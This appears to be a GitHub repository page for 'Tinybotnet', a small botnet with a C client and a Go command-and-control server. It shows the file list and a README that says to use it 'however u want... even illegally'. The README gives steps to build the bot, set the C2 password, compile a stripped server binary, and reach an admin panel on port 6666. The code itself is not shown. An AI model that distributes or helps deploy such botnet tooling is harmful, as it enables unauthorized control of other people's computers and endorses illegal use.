A small C botnet with a Go cnc
- C 51.5%
- Go 45.9%
- Makefile 2.6%
| .gitignore | ||
| client.c | ||
| LICENSE | ||
| makefile | ||
| README.md | ||
| server.go | ||
| xortool.c | ||
Tinybotnet
A small C botnet with a Go cnc
note
use however u want, idk, even illegally
setting up bot
run the makefile with
make release
setting up cnc
first change the default password to ur desired password in server.go then run the command with the Go compiler
Go mod init tinybotnet
Go mod tidy
Go build -ldflags "-s -w" server.go
advice
it is recommended to use PuTTy for logging into the admin panel, log in on port 6666.